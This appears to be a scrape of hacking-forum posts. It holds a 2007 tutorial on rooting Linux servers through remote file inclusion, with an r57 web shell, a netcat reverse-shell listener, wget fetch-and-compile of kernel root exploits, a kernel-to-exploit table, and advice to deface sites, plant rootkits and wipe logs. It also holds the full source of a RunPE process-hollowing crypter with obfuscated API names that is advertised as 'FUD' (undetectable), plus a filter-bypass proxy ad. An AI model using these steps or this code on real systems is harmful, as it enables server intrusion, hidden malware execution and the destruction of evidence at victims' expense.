         dwPlatformId As Long
         szCSDVersion As String * 128
         wServicePackMajor As Integer
         wServicePackMinor As Integer
         wSuiteMask As Integer
         wProductType As Byte
         wReserved As Byte
     End Type

     Public Function GetWindowsVersion() As String
         Dim OS As OSVERSIONINFO
         Dim durum As Boolean
         Dim version As String

         OS.OSVersionInfoSize = Len(OS)
         durum = GetVersionEx(OS)
         ' PlatformId.Major.Minor (1 = Win9x family, 2 = NT family)
         version = OS.PlatformId & "." & OS.MajorVersion & "." & OS.MinorVersion

         Select Case version
             Case "1.4.0"
                 GetWindowsVersion = "Win 95"
             Case "1.4.10"
                 GetWindowsVersion = "Win 98"
             Case "1.4.98"
                 GetWindowsVersion = "Win ME"
             Case "2.3.51"
                 GetWindowsVersion = "Win NT 3"
             Case "2.4.0"
                 GetWindowsVersion = "Win NT 4"
             Case "2.5.0"
                 GetWindowsVersion = "Win 2000"
             Case "2.5.1"
                 GetWindowsVersion = "Win XP"
             Case "2.6.0"
                 GetWindowsVersion = "Win Vista"
             Case "2.6.1"
                 GetWindowsVersion = "Win Seven"
             Case Else
                 GetWindowsVersion = "Unknown"
         End Select
     End Function

     Private Sub Form_Load()
         MsgBox GetWindowsVersion()
     End Sub
  19. DIE (Detect it Easy) detects most common packers, cryptors and compilers for PE files. Download: http://www.2shared.com/file/7117852/18ce07d4/Detect_it_easy.html
  20. R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

     Author: An@sA_StAxtH
     Mail/MSN: admin@cyberanarchy.org / anasa_staxth@hotmail.com
     For Cyber Anarchy (Nov. 2007)
     -----------------------------------------------------------------------

     You will need:
     - Vulnerable Site in R.F.I.
     - Shell for R.F.I. (e.g. c99, r57 or other)
     - NetCat
     - Local Root Exploit (depending on the kernel and the version)

     The aim of this tutorial is to give a very general picture of the process of rooting a Linux server with Safe Mod: OFF.

     Suppose that we have found a site with an R.F.I. vulnerability:

     http://www.hackedsite.com/folder/index.html?page=

     We can run a shell exploiting Remote File Inclusion, as follows:

     http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

     where evilscript.txt is our web shell that we have already uploaded to our site (www.mysite.com in the folder: shells).

     After we enter the shell, first of all we will see the version of the kernel at the top of the page or by typing: uname -a in the command line.

     To continue we must connect with a back-connection to the box. This can be done in two ways if we have a suitable shell. We can use the Back-Connect module of the r57/c99 shell or upload a backconnector in a writable folder. In most of the shells there is a backconnection feature without having to upload the Connect Back Shell (or another shell in perl/c). We will analyze the first way, which is inside the shell (in our example the shell is r57).

     Initially we open NetCat and set it to listen on a specific port (this port must be correctly opened/forwarded in NAT/Firewall if we have a router) in the following way:

     We will type: 11457 in the port input (This is the default port for the latest versions of the r57 shell). We can use another port as well.

     We press in Windows Start -> Run -> and we type: cmd

     Then we go to the NetCat directory, e.g.:

     cd C:\Program Files\Netcat

     And we type the following command:

     nc -n -l -v -p 11457

     NetCat responds: listening on [any] 11457 ...

     In the central page of the r57 shell we find under the menu ::: Net:: the back-connect entry. In the IP form we will type our IP (www.cmyip.com to see our IP if we have a dynamic one). In the Port form we will put the port that we opened and NetCat listens on. If we press connect the shell will respond:

     Now script try connect to <IP here> port 11457 ...

     If our settings are correct NetCat will give us a shell on the server.

     Now we will continue to the rooting process. We must find a writable folder in order to download and compile the Local Root Exploit that will give us root privileges on the box. Depending on the version of the Linux kernel there are different exploits. Sometimes the exploits fail to run because some boxes are patched or we don't have the correct permissions.

     List of the exploits/kernel:
     2.4.17 -> newlocal, kmod, uselib24
     2.4.18 -> brk, brk2, newlocal, kmod
     2.4.19 -> brk, brk2, newlocal, kmod
     2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
     2.4.21 -> brk, brk2, ptrace, ptrace-kmod
     2.4.22 -> brk, brk2, ptrace, ptrace-kmod
     2.4.22-10 -> loginx
     2.4.23 -> mremap_pte
     2.4.24 -> mremap_pte, uselib24
     2.4.25-1 -> uselib24
     2.4.27 -> uselib24
     2.6.2 -> mremap_pte, krad, h00lyshit
     2.6.5 -> krad, krad2, h00lyshit
     2.6.6 -> krad, krad2, h00lyshit
     2.6.7 -> krad, krad2, h00lyshit
     2.6.8 -> krad, krad2, h00lyshit
     2.6.8-5 -> krad2, h00lyshit
     2.6.9 -> krad, krad2, h00lyshit
     2.6.9-34 -> r00t, h00lyshit
     2.6.10 -> krad, krad2, h00lyshit
     2.6.13 -> raptor, raptor2, h0llyshit, prctl
     2.6.14 -> raptor, raptor2, h0llyshit, prctl
     2.6.15 -> raptor, raptor2, h0llyshit, prctl
     2.6.16 -> raptor, raptor2, h0llyshit, prctl

     We will see the case of the 2.6.8 Linux kernel. We will need the h00lyshit exploit.

     Some sites where we can find Local Root Exploits: www.milw0rm (Try Search: "linux kernel")
     Other sites: www.packetstormsecurity.org | www.arblan.com or try Googlin', you can find 'em all.

     We can find writable folders/files by typing:

     find / -perm -2 -ls

     We can use the /tmp folder, which is a standard writable folder. We type:

     cd /tmp

     To download the local root exploit we can use a download command for Linux like wget. For example:

     wget http://www.arblan.com/localroot/h00lyshit.c

     where http://www.arblan.com/localroot/h00lyshit.c is the URL of h00lyshit.

     After the download we must compile the exploit (read the instructions of the exploit before compiling). For h00lyshit we must type:

     gcc h00lyshit.c -o h00lyshit

     Now we have created the executable file: h00lyshit. The command to run this exploit is:

     ./h00lyshit <very big file on the disk>

     We need a very big file on the disk in order to run successfully and get root. We must create a big file in /tmp or in another writable folder. The command is:

     dd if=/dev/urandom of=largefile count=2M

     where largefile is the filename. We must wait 2-3 minutes for the file creation. If this command fails we can try:

     dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

     Now we can proceed to the last step. We can run the exploit by typing:

     ./h00lyshit largefile

     or

     ./h00lyshit /tmp/largefile

     (if we are in a different writable folder and the largefile is created in /tmp). If there are no runtime errors (maybe the kernel is patched or something is wrong with the exploit run or the large file) we will get root. To check if we got root:

     id

     or

     whoami

     If it says root we got root! Now we can deface/mass deface all the sites of the server or set up a rootkit (e.g. SSHDoor) and take ssh/telnet shell access to the server. We must erase all logs in order to be safe, with a log cleaner. A good cleaner for this job is the MIG Log Cleaner.

     <An@sA_StAxtH> <admin@cyberanarchy.org> * <www.cyberanarchy.org>
  21. Ultrasurf V9.5 (100% Anonymous Surfing!)

    Privacy
    Protect Internet privacy with anonymous surfing and browsing -- hide IP addresses and locations, clean browsing history, cookies & more ...

    Security
    Completely transparent data transfer and high level encryption of the content allow you to surf the web with high security.

    Freedom
    UltraSurf allows you to overcome the censorship and blockage on the Internet. You can browse any website freely, so as to obtain true information from the free world.

    With this program you can change the proxies of Internet Explorer and get into the pages that the computer administrators have locked at places such as schools, libraries and others ... To operate it, open it and wait until it writes "successfully connected to server!", then open Internet Explorer, go to any page you want and we are in!

    You can also use it as a normal Proxy Server in Internet Explorer to surf 100% anonymously online.

    Download: http://www.mediafire.com/download.php?jyjtymyjyvm
  22. Who has chmod 777, the folder in which all the files are located?
  23. Nytro

    re

    Yes, it's her, I went to a contest in Tg. Jiu and she was there too.
  24. Nytro

    re

    This is her:
  25. by Karcrack ( modded cobein's RunPE ) Native & Just RtlMoveMemory

    '---------------------------------------------------------------------------------------
    ' Module      : cNtPEL
    ' DateTime    : 30/06/2009 06:32
    ' Author      : Cobein
    ' Mail        : cobein27@hotmail.com
    ' WebPage     : http://www.advancevb.com.ar (updated =D)
    ' Purpose     : Inject Exe
    ' Usage       : At your own risk
    ' Requirements: None
    ' Distribution: You can freely use this code in your own
    '               applications, but you may not reproduce
    '               or publish this code on any web site,
    '               online service, or distribute as source
    '               on any media without express permission.
    '
    ' Thanks to   : This is gonna be a looong list xD
    '               Batfitch - kernel base asm
    '               Karcrack - For helping me to debug and test it
    '               Paul Caton - vTable patch examples
    '               rm_code - First call api prototype
    '               and different books and pappers
    '
    ' Compile     : P-Code !!!
    '
    ' Comments    : Coded on top of the invoke module.
    '
    ' History     : 30/06/2009 First Cut....................................................
    '               02/08/2009 Modded By Karcrack, Now is NtRunPEL, thanks Slayer (;........
    '---------------------------------------------------------------------------------------
    Option Explicit

    Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D&
    Private Const IMAGE_NT_SIGNATURE As Long = &H4550&
    Private Const SIZE_DOS_HEADER As Long = &H40
    Private Const SIZE_NT_HEADERS As Long = &HF8
    Private Const SIZE_EXPORT_DIRECTORY As Long = &H28
    Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28

    Private Const THUNK_APICALL As String = "8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3"
    Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3"

    Private Const PATCH1 As String = "<PATCH1>"
    Private Const PATCH2 As String = "<PATCH2>"

    Private Const CONTEXT_FULL As Long = &H10007
    Private Const CREATE_SUSPENDED As Long = &H4
    Private Const MEM_COMMIT As Long = &H1000
    Private Const MEM_RESERVE As Long = &H2000
    Private Const PAGE_EXECUTE_READWRITE As Long = &H40

    Private Type STARTUPINFO
        cb As Long
        lpReserved As Long
        lpDesktop As Long
        lpTitle As Long
        dwX As Long
        dwY As Long
        dwXSize As Long
        dwYSize As Long
        dwXCountChars As Long
        dwYCountChars As Long
        dwFillAttribute As Long
        dwFlags As Long
        wShowWindow As Integer
        cbReserved2 As Integer
        lpReserved2 As Long
        hStdInput As Long
        hStdOutput As Long
        hStdError As Long
    End Type

    Private Type PROCESS_INFORMATION
        hProcess As Long
        hThread As Long
        dwProcessID As Long
        dwThreadID As Long
    End Type

    Private Type FLOATING_SAVE_AREA
        ControlWord As Long
        StatusWord As Long
        TagWord As Long
        ErrorOffset As Long
        ErrorSelector As Long
        DataOffset As Long
        DataSelector As Long
        RegisterArea(1 To 80) As Byte
        Cr0NpxState As Long
    End Type

    Private Type CONTEXT
        ContextFlags As Long
        Dr0 As Long
        Dr1 As Long
        Dr2 As Long
        Dr3 As Long
        Dr6 As Long
        Dr7 As Long
        FloatSave As FLOATING_SAVE_AREA
        SegGs As Long
        SegFs As Long
        SegEs As Long
        SegDs As Long
        Edi As Long
        Esi As Long
        Ebx As Long
        Edx As Long
        Ecx As Long
        Eax As Long
        Ebp As Long
        Eip As Long
        SegCs As Long
        EFlags As Long
        Esp As Long
        SegSs As Long
    End Type

    Private Type IMAGE_DOS_HEADER
        e_magic As Integer
        e_cblp As Integer
        e_cp As Integer
        e_crlc As Integer
        e_cparhdr As Integer
        e_minalloc As Integer
        e_maxalloc As Integer
        e_ss As Integer
        e_sp As Integer
        e_csum As Integer
        e_ip As Integer
        e_cs As Integer
        e_lfarlc As Integer
        e_ovno As Integer
        e_res(0 To 3) As Integer
        e_oemid As Integer
        e_oeminfo As Integer
        e_res2(0 To 9) As Integer
        e_lfanew As Long
    End Type

    Private Type IMAGE_FILE_HEADER
        Machine As Integer
        NumberOfSections As Integer
        TimeDateStamp As Long
        PointerToSymbolTable As Long
        NumberOfSymbols As Long
        SizeOfOptionalHeader As Integer
        Characteristics As Integer
    End Type

    Private Type IMAGE_DATA_DIRECTORY
        VirtualAddress As Long
        Size As Long
    End Type

    Private Type IMAGE_OPTIONAL_HEADER
        Magic As Integer
        MajorLinkerVersion As Byte
        MinorLinkerVersion As Byte
        SizeOfCode As Long
        SizeOfInitializedData As Long
        SizeOfUnitializedData As Long
        AddressOfEntryPoint As Long
        BaseOfCode As Long
        BaseOfData As Long
        ImageBase As Long
        SectionAlignment As Long
        FileAlignment As Long
        MajorOperatingSystemVersion As Integer
        MinorOperatingSystemVersion As Integer
        MajorImageVersion As Integer
        MinorImageVersion As Integer
        MajorSubsystemVersion As Integer
        MinorSubsystemVersion As Integer
        W32VersionValue As Long
        SizeOfImage As Long
        SizeOfHeaders As Long
        CheckSum As Long
        SubSystem As Integer
        DllCharacteristics As Integer
        SizeOfStackReserve As Long
        SizeOfStackCommit As Long
        SizeOfHeapReserve As Long
        SizeOfHeapCommit As Long
        LoaderFlags As Long
        NumberOfRvaAndSizes As Long
        DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
    End Type

    Private Type IMAGE_NT_HEADERS
        Signature As Long
        FileHeader As IMAGE_FILE_HEADER
        OptionalHeader As IMAGE_OPTIONAL_HEADER
    End Type

    Private Type IMAGE_EXPORT_DIRECTORY
        Characteristics As Long
        TimeDateStamp As Long
        MajorVersion As Integer
        MinorVersion As Integer
        lpName As Long
        Base As Long
        NumberOfFunctions As Long
        NumberOfNames As Long
        lpAddressOfFunctions As Long
        lpAddressOfNames As Long
        lpAddressOfNameOrdinals As Long
    End Type

    Private Type IMAGE_SECTION_HEADER
        SecName As String * 8
        VirtualSize As Long
        VirtualAddress As Long
        SizeOfRawData As Long
        PointerToRawData As Long
        PointerToRelocations As Long
        PointerToLinenumbers As Long
        NumberOfRelocations As Integer
        NumberOfLinenumbers As Integer
        Characteristics As Long
    End Type

    Private Declare Sub CpyMem Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long)

    Private c_lKrnl As Long
    Private c_lLoadLib As Long
    Private c_bInit As Boolean
    Private c_lVTE As Long
    Private c_lOldVTE As Long
    Private c_bvASM(&HFF) As Byte

    Public Function zDoNotCall() As Long
        'This function will be replaced with machine code laterz
        'Do not add any public procedure on top of it
    End Function

    Public Function RunPE(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean
        Dim i As Long
        Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
        Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
        Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER
        Dim tSTARTUPINFO As STARTUPINFO
        Dim tPROCESS_INFORMATION As PROCESS_INFORMATION
        Dim tCONTEXT As CONTEXT
        Dim lKernel As Long
        Dim lNTDll As Long
        Dim lMod As Long

        If Not c_bInit Then Exit Function

        Call CpyMem(tIMAGE_DOS_HEADER, bvBuff(0), SIZE_DOS_HEADER)
        If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
            Exit Function
        End If

        Call CpyMem(tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS)
        If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
            Exit Function
        End If

        'kernel32
        lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332")) 'KPC
        'ntdll
        lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C")) 'KPC

        If sHost = vbNullString Then
            sHost = Space(260)
            'GetModuleFileNameW
            lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557")) 'KPC
            Invoke lMod, App.hInstance, StrPtr(sHost), 260
        End If

        With tIMAGE_NT_HEADERS.OptionalHeader
            tSTARTUPINFO.cb = Len(tSTARTUPINFO)
            'CreateProcessW
            lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357")) 'KPC
            Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)
            'NtUnmapViewOfSection
            lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase
            'VirtualAllocEx
            lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
            'NtWriteVirtualMemory
            lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0

            For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
                CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER)
                Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
            Next i

            tCONTEXT.ContextFlags = CONTEXT_FULL
            'NtGetContextThread
            lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
            'NtWriteVirtualMemory
            lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0
            tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint
            'NtSetContextThread
            lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
            'NtResumeThread
            lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hThread, 0

            hProc = tPROCESS_INFORMATION.hProcess
        End With

        RunPE = True
    End Function

    Public Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long
        Dim lPtr As Long
        Dim i As Long
        Dim sData As String
        Dim sParams As String

        If lMod = 0 Then Exit Function

        For i = UBound(Params) To 0 Step -1
            sParams = sParams & "68" & GetLong(CLng(Params(i)))
        Next

        lPtr = VarPtr(c_bvASM(0))
        lPtr = lPtr + (UBound(Params) + 2) * 5
        lPtr = lMod - lPtr - 5

        sData = THUNK_APICALL
        sData = Replace(sData, PATCH1, sParams)
        sData = Replace(sData, PATCH2, GetLong(lPtr))

        Call PutThunk(sData)
        Invoke = PatchCall
    End Function

    Private Function GetLong(ByVal lData As Long) As String
        Dim bvTemp(3) As Byte
        Dim i As Long
        CpyMem bvTemp(0), lData, &H4
        For i = 0 To 3
            GetLong = GetLong & Right("0" & Hex(bvTemp(i)), 2)
        Next
    End Function

    Private Sub PutThunk(ByVal sThunk As String)
        Dim i As Long
        For i = 0 To Len(sThunk) - 1 Step 2
            c_bvASM((i / 2)) = CByte("&h" & Mid$(sThunk, i + 1, 2))
        Next i
    End Sub

    Private Function PatchCall() As Long
        CpyMem c_lVTE, ByVal ObjPtr(Me), &H4
        c_lVTE = c_lVTE + &H1C
        CpyMem c_lOldVTE, ByVal c_lVTE, &H4
        CpyMem ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4
        PatchCall = zDoNotCall
        CpyMem ByVal c_lVTE, c_lOldVTE, &H4
    End Function

    Public Function GetMod(ByVal sLib As String, ByVal sProc As String) As Long
        GetMod = Me.GetProcAddress(Me.LoadLibrary(sLib), sProc)
    End Function

    Public Function LoadLibrary(ByVal sLib As String) As Long
        LoadLibrary = Invoke(c_lLoadLib, StrPtr(sLib & vbNullChar))
    End Function

    Public Property Get Initialized() As Boolean
        Initialized = c_bInit
    End Property

    Public Sub Class_Initialize()
        Call PutThunk(THUNK_KERNELBASE)
        c_lKrnl = PatchCall
        If Not c_lKrnl = 0 Then
            c_lLoadLib = GetProcAddress(c_lKrnl, "LoadLibraryW")
            If Not c_lLoadLib = 0 Then
                c_bInit = True
            End If
        End If
    End Sub

    Public Function GetProcAddress(ByVal lMod As Long, ByVal sProc As String) As Long
        Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
        Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
        Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY

        Call CpyMem(tIMAGE_DOS_HEADER, ByVal lMod, SIZE_DOS_HEADER)
        If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
            Exit Function
        End If

        Call CpyMem(tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew, SIZE_NT_HEADERS)
        If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
            Exit Function
        End If

        Dim lVAddress As Long
        Dim lVSize As Long
        Dim lBase As Long

        With tIMAGE_NT_HEADERS.OptionalHeader
            lVAddress = lMod + .DataDirectory(0).VirtualAddress
            lVSize = lVAddress + .DataDirectory(0).Size
            lBase = .ImageBase
        End With

        Call CpyMem(tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress, SIZE_EXPORT_DIRECTORY)

        Dim i As Long
        Dim lFunctAdd As Long
        Dim lNameAdd As Long
        Dim lNumbAdd As Long

        With tIMAGE_EXPORT_DIRECTORY
            For i = 0 To .NumberOfNames - 1
                CpyMem lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4, 4
                If StringFromPtr(lBase + lNameAdd) = sProc Then
                    CpyMem lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2, 2
                    CpyMem lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4, 4
                    GetProcAddress = lFunctAdd + lBase
                    If GetProcAddress >= lVAddress And _
                       GetProcAddress <= lVSize Then
                        Call ResolveForward(GetProcAddress, lMod, sProc)
                        If Not lMod = 0 Then
                            GetProcAddress = GetProcAddress(lMod, sProc)
                        Else
                            GetProcAddress = 0
                        End If
                    End If
                    Exit Function
                End If
            Next
        End With
    End Function

    Private Function ResolveForward( _
        ByVal lAddress As Long, _
        ByRef lLib As Long, _
        ByRef sMod As String)
        Dim sForward As String
        sForward = StringFromPtr(lAddress)
        If InStr(1, sForward, ".") Then
            lLib = LoadLibrary(Split(sForward, ".")(0))
            sMod = Split(sForward, ".")(1)
        End If
    End Function

    Private Function StringFromPtr( _
        ByVal lAddress As Long) As String
        Dim bChar As Byte
        Do
            CpyMem bChar, ByVal lAddress, 1
            lAddress = lAddress + 1
            If bChar = 0 Then Exit Do
            StringFromPtr = StringFromPtr & Chr$(bChar)
        Loop
    End Function

    Private Function nlfpkgnrj(ByVal sData As String) As String
        Dim i As Long
        For i = 1 To Len(sData) Step 2
            nlfpkgnrj = nlfpkgnrj & Chr$(Val("&H" & Mid$(sData, i, 2)))
        Next i
    End Function

    That modded version uses Native APIs (Thanks Slayer ) and loads APIs at runtime... Of course, it's FUD... ALL CREDITS FOR COBEIN!!!

    BTW, it's a class module (*.cls)